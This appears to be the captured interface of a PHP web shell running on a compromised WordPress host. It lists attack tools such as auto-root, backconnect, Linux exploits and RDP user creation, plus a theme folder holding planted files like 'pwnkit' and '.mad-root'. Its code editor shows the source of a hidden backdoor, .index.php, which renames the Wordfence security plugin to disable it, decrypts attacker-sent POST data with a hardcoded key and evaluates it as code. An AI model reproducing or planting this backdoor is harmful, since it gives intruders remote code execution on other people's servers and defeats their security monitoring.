Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
[ HOME SHELL ]
Name
Size
Permission
Action
arise
[ DIR ]
drwxr-xr-x
blue-taste
[ DIR ]
drwxr-xr-x
bottom-1759686828
[ DIR ]
drwxr-xr-x
bottom-1759686960
[ DIR ]
drwxr-xr-x
bottom_1757844106
[ DIR ]
drwxr-xr-x
bottom_1773239984
[ DIR ]
drwxr-xr-x
busiprof
[ DIR ]
drwxr-xr-x
catch-box
[ DIR ]
drwxr-xr-x
catch-box child
[ DIR ]
drwx---r-x
category-template-1758042815
[ DIR ]
drwxr-xr-x
category-template-1758043221
[ DIR ]
drwxr-xr-x
category_template_1772703171
[ DIR ]
drwxr-xr-x
config-1748026639
[ DIR ]
drwxr-xr-x
config-1748028417
[ DIR ]
drwxr-xr-x
config_1773241612
[ DIR ]
drwxr-xr-x
custom-file-1-1747815916
[ DIR ]
drwxr-xr-x
custom-file-1-1758267348
[ DIR ]
drwxr-xr-x
custom-file-2-1747909462
[ DIR ]
drwxr-xr-x
custom-functions-1759686711
[ DIR ]
drwxr-xr-x
custom_file_1_1757843578
[ DIR ]
drwxr-xr-x
custom_file_3_1759687094
[ DIR ]
drwxr-xr-x
custom_file_3_1773240223
[ DIR ]
drwxr-xr-x
custom_file_4_1759686847
[ DIR ]
drwxr-xr-x
custom_file_5_1757844031
[ DIR ]
drwxr-xr-x
d5-business-line
[ DIR ]
drwxr-xr-x
enigma-parallax
[ DIR ]
drwxr-xr-x
enliven
[ DIR ]
drwxr-xr-x
error-404-1751639757
[ DIR ]
drwxr-xr-x
formation
[ DIR ]
drwxr-xr-x
front-page-template-1759687018
[ DIR ]
drwxr-xr-x
front_page_template_1758043282
[ DIR ]
drwxr-xr-x
home-1772703237
[ DIR ]
drwxr-xr-x
nature-one
[ DIR ]
drwxr-xr-x
neve
[ DIR ]
drwxr-xr-x
page_template_1757843729
[ DIR ]
drwxr-xr-x
page_template_1773241240
[ DIR ]
drwxr-xr-x
post-1747908673
[ DIR ]
drwxr-xr-x
post-1773241066
[ DIR ]
drwxr-xr-x
post_1773240490
[ DIR ]
drwxr-xr-x
search_template_1759686885
[ DIR ]
drwxr-xr-x
searchlight
[ DIR ]
drwxr-xr-x
sento
[ DIR ]
drwxr-xr-x
simplicity-lite
[ DIR ]
drwxr-xr-x
spark
[ DIR ]
drwxr-xr-x
sydney
[ DIR ]
drwxr-xr-x
top-1758042979
[ DIR ]
drwxr-xr-x
top-1759686978
[ DIR ]
drwxr-xr-x
top-1773241530
[ DIR ]
drwxr-xr-x
top_1759687111
[ DIR ]
drwxr-xr-x
top_1772702923
[ DIR ]
drwxr-xr-x
twentyeleven
[ DIR ]
drwxr-xr-x
twentyfourteen
[ DIR ]
drwxr-xr-x
twentynineteen
[ DIR ]
drwxr-xr-x
twentyseventeen
[ DIR ]
drwxr-xr-x
twentyten
[ DIR ]
drwxr-xr-x
twentythirteen
[ DIR ]
drwxr-xr-x
twentytwelve
[ DIR ]
drwxr-xr-x
widget_area_1759686751
[ DIR ]
drwxr-xr-x
widget_area_1772702772
[ DIR ]
drwxr-xr-x
.index.php
775
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
index.php
30
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
twentyeleven-de_DE.mo
14.67
KB
-rw-r--r--
twentyeleven-de_DE.po
20.19
KB
-rw-r--r--
twentyten-de_DE.mo
8.26
KB
-rw-r--r--
twentyten-de_DE.po
10.73
KB
-rw-r--r--
twentythirteen-de_DE.mo
6.48
KB
-rw-r--r--
twentythirteen-de_DE.po
9.05
KB
-rw-r--r--
twentytwelve-de_DE.mo
7.11
KB
-rw-r--r--
twentytwelve-de_DE.po
9.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .index.php
<?php if (is_file($_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence/wordfence.php')) {rename($_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence',$_SERVER['DOCUMENT_ROOT'].'/wp-content/plugins/wordfence'.rand());} @error_reporting(0); session_start(); $key="c822c1b63853ed27"; $_SESSION['k']=$key; $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); echo 'AGM'; ?>
Close